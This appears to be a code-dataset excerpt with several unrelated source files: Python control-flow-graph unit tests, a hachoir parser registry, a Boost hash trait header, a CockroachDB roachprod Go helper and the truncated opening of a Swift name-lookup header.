(None, 'a', '(a > 0)'),
('a', '(a > 0)', ('(a > 1)', '(a > 2)')),
('(a > 0)', '(a > 1)', ('a = 1', 'a = 2')),
('(a > 1)', 'a = 1', None),
('(a > 1)', 'a = 2', None),
('(a > 0)', '(a > 2)', ('a = 3', 'a = 4')),
('(a > 2)', 'a = 3', None),
('(a > 2)', 'a = 4', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'If:2', None),
('(a > 0)', 'If:3', None),
('(a > 0)', 'If:8', None),
),
)
def test_branch_straightline_semi(self):
def test_fn(a):
if a > 0:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(None, 'a', '(a > 0)'),
('a', '(a > 0)', 'a = 1'),
('(a > 0)', 'a = 1', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_branch_return(self):
def test_fn(a):
if a > 0:
return
else:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', ('return', 'a = 1')),
('(a > 0)', 'a = 1', 'a = 2'),
('(a > 0)', 'return', None),
('a = 1', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', 'a = 2'),),
)
def test_branch_return_minimal(self):
def test_fn(a):
if a > 0:
return
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', 'return'),
('(a > 0)', 'return', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'If:2', None),),
)
def test_while_straightline(self):
def test_fn(a):
while a > 0:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'While:2', 'a = 2'),),
)
def test_while_else_straightline(self):
def test_fn(a):
while a > 0:
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'While:2', 'a = 3'),),
)
def test_while_else_continue(self):
def test_fn(a):
while a > 0:
if a > 1:
continue
else:
a = 0
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'continue', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('continue', 'a = 0')),
('(a > 1)', 'continue', '(a > 0)'),
('a = 0', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', ('a = 1', '(a > 0)')),
),
)
def test_while_else_break(self):
def test_fn(a):
while a > 0:
if a > 1:
break
a = 1
else:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('break', 'a = 1')),
('(a > 1)', 'break', 'a = 3'),
('(a > 1)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
(('break', 'a = 2'), 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', ('a = 1', 'a = 3')),
),
)
def test_while_else_return(self):
def test_fn(a):
while a > 0:
if a > 1:
return
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', ('(a > 1)', 'a = 2')),
('(a > 0)', '(a > 1)', ('return', 'a = 1')),
('(a > 1)', 'return', None),
('(a > 1)', 'a = 1', '(a > 0)'),
('(a > 0)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'If:3', 'a = 1'),
),
)
def test_while_nested_straightline(self):
def test_fn(a):
while a > 0:
while a > 1:
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'a = 1'), '(a > 1)', ('a = 1', 'a = 2')),
('(a > 1)', 'a = 1', '(a > 1)'),
('(a > 1)', 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
),
)
def test_while_nested_continue(self):
def test_fn(a):
while a > 0:
while a > 1:
if a > 3:
continue
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'continue', 'a = 1'), '(a > 1)', ('(a > 3)', 'a = 2')),
('(a > 1)', '(a > 3)', ('continue', 'a = 1')),
('(a > 3)', 'continue', '(a > 1)'),
('(a > 3)', 'a = 1', '(a > 1)'),
('(a > 1)', 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
('(a > 1)', 'If:4', ('a = 1', '(a > 1)')),
),
)
def test_while_nested_break(self):
def test_fn(a):
while a > 0:
while a > 1:
if a > 2:
break
a = 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(graph, (
(('a', 'a = 2'), '(a > 0)', ('(a > 1)', 'a = 3')),
(('(a > 0)', 'a = 1'), '(a > 1)', ('(a > 2)', 'a = 2')),
('(a > 1)', '(a > 2)', ('break', 'a = 1')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', 'a = 1', '(a > 1)'),
(('(a > 1)', 'break'), 'a = 2', '(a > 0)'),
('(a > 0)', 'a = 3', None),
))
self.assertStatementEdges(
graph,
(
('a', 'While:2', 'a = 3'),
('(a > 0)', 'While:3', 'a = 2'),
('(a > 1)', 'If:4', ('a = 1', 'a = 2')),
),
)
def test_for_straightline(self):
def test_fn(a):
for a in range(0, a):
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('a = 1', 'a = 2')),
('range(0, a)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'For:2', 'a = 2'),),
)
def test_for_else_straightline(self):
def test_fn(a):
for a in range(0, a):
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('a = 1', 'a = 2')),
('range(0, a)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(('a', 'For:2', 'a = 3'),),
)
def test_for_else_continue(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
continue
else:
a = 0
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'continue', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('continue', 'a = 0')),
('(a > 1)', 'continue', 'range(0, a)'),
('(a > 1)', 'a = 0', 'a = 1'),
('a = 0', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', ('a = 1', 'range(0, a)')),
),
)
def test_for_else_break(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
break
a = 1
else:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('break', 'a = 1')),
('(a > 1)', 'break', 'a = 3'),
('(a > 1)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
(('break', 'a = 2'), 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', ('a = 1', 'a = 3')),
),
)
def test_for_else_return(self):
def test_fn(a):
for a in range(0, a):
if a > 1:
return
a = 1
else: # pylint:disable=useless-else-on-loop
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), 'range(0, a)', ('(a > 1)', 'a = 2')),
('range(0, a)', '(a > 1)', ('return', 'a = 1')),
('(a > 1)', 'return', None),
('(a > 1)', 'a = 1', 'range(0, a)'),
('range(0, a)', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'If:3', 'a = 1'),
),
)
def test_for_nested_straightline(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'b += 1'), 'range(1, a)', ('b += 1', 'a = 2')),
('range(1, a)', 'b += 1', 'range(1, a)'),
('range(1, a)', 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
),
)
def test_for_nested_continue(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
if a > 3:
continue
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'continue', 'b += 1'), 'range(1, a)',
('(a > 3)', 'a = 2')),
('range(1, a)', '(a > 3)', ('continue', 'b += 1')),
('(a > 3)', 'continue', 'range(1, a)'),
('(a > 3)', 'b += 1', 'range(1, a)'),
('range(1, a)', 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
('range(1, a)', 'If:4', ('b += 1', 'range(1, a)')),
),
)
def test_for_nested_break(self):
def test_fn(a):
for a in range(0, a):
for b in range(1, a):
if a > 2:
break
b += 1
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 2'), 'range(0, a)', ('range(1, a)', 'a = 3')),
(('range(0, a)', 'b += 1'), 'range(1, a)', ('(a > 2)', 'a = 2')),
('range(1, a)', '(a > 2)', ('break', 'b += 1')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', 'b += 1', 'range(1, a)'),
(('range(1, a)', 'break'), 'a = 2', 'range(0, a)'),
('range(0, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'For:2', 'a = 3'),
('range(0, a)', 'For:3', 'a = 2'),
('range(1, a)', 'If:4', ('b += 1', 'a = 2')),
),
)
def test_complex(self):
def test_fn(a):
b = 0
while a > 0:
for b in range(0, a):
if a > 2:
break
if a > 3:
if a > 4:
continue
else:
max(a)
break
b += 1
else: # for b in range(0, a):
return a
a = 2
for a in range(1, a):
return b
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('b = 0', 'a = 2'), '(a > 0)', ('range(0, a)', 'range(1, a)')),
(
('(a > 0)', 'continue', 'b += 1'),
'range(0, a)',
('(a > 2)', 'return a'),
),
('range(0, a)', '(a > 2)', ('(a > 3)', 'break')),
('(a > 2)', 'break', 'a = 2'),
('(a > 2)', '(a > 3)', ('(a > 4)', 'b += 1')),
('(a > 3)', '(a > 4)', ('continue', 'max(a)')),
('(a > 4)', 'max(a)', 'break'),
('max(a)', 'break', 'a = 2'),
('(a > 4)', 'continue', 'range(0, a)'),
('(a > 3)', 'b += 1', 'range(0, a)'),
('range(0, a)', 'return a', None),
('break', 'a = 2', '(a > 0)'),
('(a > 0)', 'range(1, a)', ('return b', 'a = 3')),
('range(1, a)', 'return b', None),
('range(1, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('b = 0', 'While:3', 'range(1, a)'),
('(a > 0)', 'For:4', 'a = 2'),
('range(0, a)', 'If:5', ('(a > 3)', 'a = 2')),
('(a > 2)', 'If:7', ('b += 1', 'a = 2', 'range(0, a)')),
('(a > 3)', 'If:8', ('a = 2', 'range(0, a)')),
('(a > 0)', 'For:17', 'a = 3'),
),
)
def test_finally_straightline(self):
def test_fn(a):
try:
a += 1
finally:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a += 1', 'a = 2'),
('a += 1', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
def test_return_finally(self):
def test_fn(a):
try:
return a
finally:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'return a', 'a = 1'),
('return a', 'a = 1', None),
(None, 'a = 2', None),
),
)
def test_break_finally(self):
def test_fn(a):
while a > 0:
try:
break
finally:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', 'break'),
('(a > 0)', 'break', 'a = 1'),
('break', 'a = 1', None),
),
)
def test_continue_finally(self):
def test_fn(a):
while a > 0:
try:
continue
finally:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', 'continue'),
('(a > 0)', 'continue', 'a = 1'),
('continue', 'a = 1', '(a > 0)'),
),
)
def test_with_straightline(self):
def test_fn(a):
with max(a) as b:
a = 0
return b
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'max(a)', 'a = 0'),
('max(a)', 'a = 0', 'return b'),
('a = 0', 'return b', None),
),
)
def test_lambda_basic(self):
def test_fn(a):
a = lambda b: a + b
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = lambda b: a + b', 'return a'),
('a = lambda b: a + b', 'return a', None),
),
)
def test_pass(self):
def test_fn(a): # pylint:disable=unused-argument
pass
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'pass', None),
),
)
def test_try_finally(self):
def test_fn(a):
try:
a = 1
finally:
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 1', 'a = 2', 'return a'),
('a = 2', 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
),
)
def test_try_except_single_bare(self):
def test_fn(a):
try:
a = 1
a = 2
except: # pylint:disable=bare-except
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 2', 'a = 3', 'return a'),
(('a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 2', 'ExceptHandler:5', 'return a'),
),
)
def test_try_except_single(self):
def test_fn(a):
try:
a = 1
a = 2
except Exception1: # pylint:disable=undefined-variable
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 2', 'a = 3', 'return a'),
(('a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 2', 'ExceptHandler:5', 'return a'),
),
)
def test_try_except_single_aliased(self):
def test_fn(a):
try:
a = 1
except Exception1 as e: # pylint:disable=undefined-variable,unused-variable
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'return a')),
(('a = 1', 'a = 2'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
),
)
def test_try_except_single_tuple_aliased(self):
def test_fn(a):
try:
a = 1
except (Exception1, Exception2) as e: # pylint:disable=undefined-variable,unused-variable
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'return a')),
(('a = 1', 'a = 2'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
),
)
def test_try_except_multiple(self):
def test_fn(a):
try:
a = 1
except Exception1: # pylint:disable=undefined-variable
a = 2
except Exception2: # pylint:disable=undefined-variable
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'a = 3', 'return a')),
(('a = 1', 'a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
('a = 1', 'ExceptHandler:6', 'return a'),
),
)
def test_try_except_finally(self):
def test_fn(a):
try:
a = 1
except Exception1: # pylint:disable=undefined-variable
a = 2
except Exception2: # pylint:disable=undefined-variable
a = 3
finally:
a = 4
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'a = 3', 'a = 4')),
(('a = 1', 'a = 2', 'a = 3'), 'a = 4', 'return a'),
('a = 4', 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'a = 4'),
('a = 1', 'ExceptHandler:6', 'a = 4'),
),
)
def test_try_in_if(self):
def test_fn(a):
try:
if a > 0:
a = 1
else:
a = 2
except Exception1: # pylint:disable=undefined-variable
a = 3
a = 4
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', ('a = 3', 'a = 4')),
('(a > 0)', 'a = 2', ('a = 3', 'a = 4')),
(('a = 1', 'a = 2'), 'a = 3', 'a = 4'),
(('a = 1', 'a = 2', 'a = 3'), 'a = 4', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'a = 4'),
('a', 'If:3', ('a = 3', 'a = 4')),
(('a = 1', 'a = 2'), 'ExceptHandler:7', 'a = 4'),
),
)
def test_try_in_if_all_branches_exit(self):
def test_fn(a, b):
try:
if a > 0:
raise b
else:
return 0
except b:
return 1
graph, = self._build_cfg(test_fn).values()
# TODO(mdan): raise and return should have an edge to the except blocks.
self.assertGraphMatches(
graph,
(
('a, b', '(a > 0)', ('raise b', 'return 0')),
('(a > 0)', 'raise b', None),
('(a > 0)', 'return 0', None),
(None, 'return 1', None),
),
)
self.assertStatementEdges(
graph,
(
('a, b', 'Try:2', None),
('a, b', 'If:3', None),
(None, 'ExceptHandler:7', None),
),
)
def test_list_comprehension(self):
def test_fn(a):
c = [b for b in a]
return c
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'c = [b for b in a]', 'return c'),
('c = [b for b in a]', 'return c', None),
),
)
def test_class_definition_empty(self):
def test_fn(a, b):
class C(a(b)):
pass
return C
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a, b', 'class C', 'return C'),
('class C', 'return C', None),
),
)
def test_class_definition_with_members(self):
def test_fn(a, b):
class C(a(b)):
d = 1
return C
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a, b', 'class C', 'return C'),
('class C', 'return C', None),
),
)
if __name__ == '__main__':
test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import re
import types
from lib.hachoir_core.error import error
from lib.hachoir_core.i18n import _
from lib.hachoir_parser import Parser, HachoirParser
import sys
### Parser list ################################################################
class ParserList(object):
VALID_CATEGORY = ("archive", "audio", "container", "file_system",
"game", "image", "misc", "program", "video")
ID_REGEX = re.compile("^[a-z0-9][a-z0-9_]{2,}$")
def __init__(self):
self.parser_list = []
self.bytag = { "id": {}, "category": {} }
def translate(self, name, value):
if name in ("magic",):
return True
elif name == "min_size":
return - value < 0 or "Invalid minimum size (min_size)"
elif name == "description":
return isinstance(value, (str, unicode)) and bool(value) or "Invalid description"
elif name == "category":
if value not in self.VALID_CATEGORY:
return "Invalid category: %r" % value
elif name == "id":
if type(value) is not str or not self.ID_REGEX.match(value):
return "Invalid identifier: %r" % value
parser = self.bytag[name].get(value)
if parser:
return "Duplicate parser id: %s already used by %s" % \
(value, parser[0].__name__)
# TODO: lists should be forbidden
if isinstance(value, list):
value = tuple(value)
elif not isinstance(value, tuple):
value = value,
return name, value
def validParser(self, parser, tags):
if "id" not in tags:
return "No identifier"
if "description" not in tags:
return "No description"
# TODO: Allow simple strings for file_ext/mime ?
# (see also HachoirParser.createFilenameSuffix)
file_ext = tags.get("file_ext", ())
if not isinstance(file_ext, (tuple, list)):
return "File extension is not a tuple or list"
mimes = tags.get("mime", ())
if not isinstance(mimes, tuple):
return "MIME type is not a tuple"
for mime in mimes:
if not isinstance(mime, unicode):
return "MIME type %r is not an unicode string" % mime
return ""
def add(self, parser):
tags = parser.getParserTags()
err = self.validParser(parser, tags)
if err:
error("Skip parser %s: %s" % (parser.__name__, err))
return
_tags = []
for tag in tags.iteritems():
tag = self.translate(*tag)
if isinstance(tag, tuple):
_tags.append(tag)
elif tag is not True:
error("[%s] %s" % (parser.__name__, tag))
return
self.parser_list.append(parser)
for name, values in _tags:
byname = self.bytag.setdefault(name,{})
for value in values:
byname.setdefault(value,[]).append(parser)
def __iter__(self):
return iter(self.parser_list)
def print_(self, title=None, out=None, verbose=False, format="one-line"):
"""Display a list of parser with its title
* out: output file
* title : title of the list to display
* format: "rest", "trac", "file-ext", "mime" or "one_line" (default)
"""
if out is None:
out = sys.stdout
if format in ("file-ext", "mime"):
# Create file extension set
extensions = set()
for parser in self:
file_ext = parser.getParserTags().get(format, ())
file_ext = list(file_ext)
try:
file_ext.remove("")
except ValueError:
pass
extensions |= set(file_ext)
# Remove empty extension
extensions -= set(('',))
# Convert to list and sort by ASCII order
extensions = list(extensions)
extensions.sort()
# Print list
text = ", ".join( str(item) for item in extensions )
if format == "file-ext":
print >>out, "File extensions: %s." % text
print >>out
print >>out, "Total: %s file extensions." % len(extensions)
else:
print >>out, "MIME types: %s." % text
print >>out
print >>out, "Total: %s MIME types." % len(extensions)
return
if format == "trac":
print >>out, "== List of parsers =="
print >>out
print >>out, "Total: %s parsers" % len(self.parser_list)
print >>out
elif format == "one_line":
if title:
print >>out, title
else:
print >>out, _("List of Hachoir parsers.")
print >>out
# Create parser list sorted by module
bycategory = self.bytag["category"]
for category in sorted(bycategory.iterkeys()):
if format == "one_line":
parser_list = [ parser.PARSER_TAGS["id"] for parser in bycategory[category] ]
parser_list.sort()
print >>out, "- %s: %s" % (category.title(), ", ".join(parser_list))
else:
if format == "rest":
print >>out, category.replace("_", " ").title()
print >>out, "-" * len(category)
print >>out
elif format == "trac":
print >>out, "=== %s ===" % category.replace("_", " ").title()
print >>out
else:
print >>out, "[%s]" % category
parser_list = sorted(bycategory[category],
key=lambda parser: parser.PARSER_TAGS["id"])
if format == "rest":
for parser in parser_list:
tags = parser.getParserTags()
print >>out, "* %s: %s" % (tags["id"], tags["description"])
elif format == "trac":
for parser in parser_list:
tags = parser.getParserTags()
desc = tags["description"]
desc = re.sub(r"([A-Z][a-z]+[A-Z][^ ]+)", r"!\1", desc)
print >>out, " * %s: %s" % (tags["id"], desc)
else:
for parser in parser_list:
parser.print_(out, verbose)
print >>out
if format != "trac":
print >>out, "Total: %s parsers" % len(self.parser_list)
class HachoirParserList(ParserList):
_instance = None
@classmethod
def getInstance(cls):
if cls._instance is None:
cls._instance = cls()
return cls._instance
def __init__(self):
ParserList.__init__(self)
self._load()
def _load(self):
"""
Load all parsers from "hachoir.parser" module.
Return the list of loaded parsers.
"""
# Parser list is already loaded?
if self.parser_list:
return self.parser_list
todo = []
from lib import hachoir_parser
module = hachoir_parser
for attrname in dir(module):
attr = getattr(module, attrname)
if isinstance(attr, types.ModuleType):
todo.append(attr)
for module in todo:
for name in dir(module):
attr = getattr(module, name)
if isinstance(attr, type) \
and issubclass(attr, HachoirParser) \
and attr not in (Parser, HachoirParser):
self.add(attr)
assert 1 <= len(self.parser_list)
return self.parser_list
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright 2022 Peter Dimov.
// Distributed under the Boost Software License, Version 1.0.
// https://www.boost.org/LICENSE_1_0.txt
#ifndef BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
#define BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
#include <boost/describe/bases.hpp>
#include <boost/describe/members.hpp>
#include <type_traits>
namespace boost
{
namespace container_hash
{
#if defined(BOOST_DESCRIBE_CXX11)
template<class T> struct is_described_class: std::integral_constant<bool,
describe::has_describe_bases<T>::value &&
describe::has_describe_members<T>::value &&
!std::is_union<T>::value>
{
};
#else
template<class T> struct is_described_class: std::false_type
{
};
#endif
} // namespace container_hash
} // namespace boost
#endif // #ifndef BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
|
unknown
|
github
|
https://github.com/mysql/mysql-server
|
extra/boost/boost_1_87_0/boost/container_hash/is_described_class.hpp
|
// Copyright 2021 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package roachprod
import (
"context"
"github.com/cockroachdb/cockroach/pkg/roachprod/install"
"github.com/cockroachdb/cockroach/pkg/roachprod/logger"
)
// StartServiceForVirtualCluster starts SQL/HTTP instances for a
// virtual cluster. If the `startOpts` indicate that the service is
// external, this will create processes on an underlying
// roachprod-created cluster of VMs. The SQL/HTTP instances connect to
// a storage cluster, which must be running already.
func StartServiceForVirtualCluster(
ctx context.Context,
l *logger.Logger,
storageCluster string,
startOpts install.StartOpts,
clusterSettingsOpts ...install.ClusterSettingOption,
) error {
// TODO(radu): do we need separate clusterSettingsOpts for the storage cluster?
sc, err := newCluster(l, storageCluster, clusterSettingsOpts...)
if err != nil {
return err
}
startOpts.StorageCluster = sc
// If we are starting a service in shared process mode, `Start` is
// called on the storage cluster itself.
startCluster := sc
if startOpts.Target == install.StartServiceForVirtualCluster {
l.Printf("Starting SQL/HTTP instances for the virtual cluster")
// If we are starting a service in external process mode, `Start`
// is called on the nodes where the SQL server processed should be
// created.
ec, err := newCluster(l, startOpts.VirtualClusterLocation, clusterSettingsOpts...)
if err != nil {
return err
}
startCluster = ec
}
return startCluster.Start(ctx, l, startOpts)
}
// StopServiceForVirtualCluster stops SQL instance processes on the virtualCluster given.
func StopServiceForVirtualCluster(
ctx context.Context,
l *logger.Logger,
clusterName string,
secure install.SecureOption,
stopOpts StopOpts,
) error {
c, err := newCluster(l, clusterName, secure)
if err != nil {
return err
}
label := install.VirtualClusterLabel(stopOpts.VirtualClusterName, stopOpts.SQLInstance)
return c.Stop(ctx, l, stopOpts.Sig, stopOpts.Wait, stopOpts.GracePeriod, label)
}
|
go
|
github
|
https://github.com/cockroachdb/cockroach
|
pkg/roachprod/multitenant.go
|
//===--- ModuleNameLookup.h - Name lookup within a module -------*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines interfaces for performing top-level name lookup into a
// set of imported modules.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_AST_MODULE_NAME_LOOKUP_H
#define SWIFT_AST_MODULE_NAME_LOOKUP_H
#include "llvm/ADT/SmallVector.h"
#include "swift/AST/Identifier.h"
#include "swift/AST/Module.h"
#include "swift/Basic/SourceLoc.h"
namespace swift {
class ValueDecl;
namespace namelookup {
enum class ResolutionKind {
/// Lookup can match any number of decls, as long as they are all
/// overloadable.
///
/// If non-overloadable decls are returned, this indicates ambiguous lookup.
Overloadable,
/// Lookup should match a single decl that declares a type.
TypesOnly,
/// Lookup should only match macros.
MacrosOnly,
};
void simple_display(llvm::raw_ostream &out, ResolutionKind kind);
/// Performs a lookup into the given module and its imports.
///
/// If 'moduleOrFile' is a ModuleDecl, we search the module and its
/// public imports. If 'moduleOrFile' is a SourceFile, we search the
/// file's parent module, the module's public imports, and the source
/// file's private imports.
///
/// \param moduleOrFile The module or file unit to search, including imports.
/// \param name The name to look up.
/// \param hasModuleSelector Whether \p name was originally qualified by a
/// module selector. This information is threaded through to underlying
/// lookup calls; the callee is responsible for actually applying the
/// module selector.
/// \param[out] decls Any found decls will be added to this vector.
/// \param lookupKind Whether this lookup is qualified or unqualified.
/// \param resolutionKind What sort of decl is expected.
/// \param moduleScopeContext The top-level context from which the lookup is
/// being performed, for checking access. This must be either a
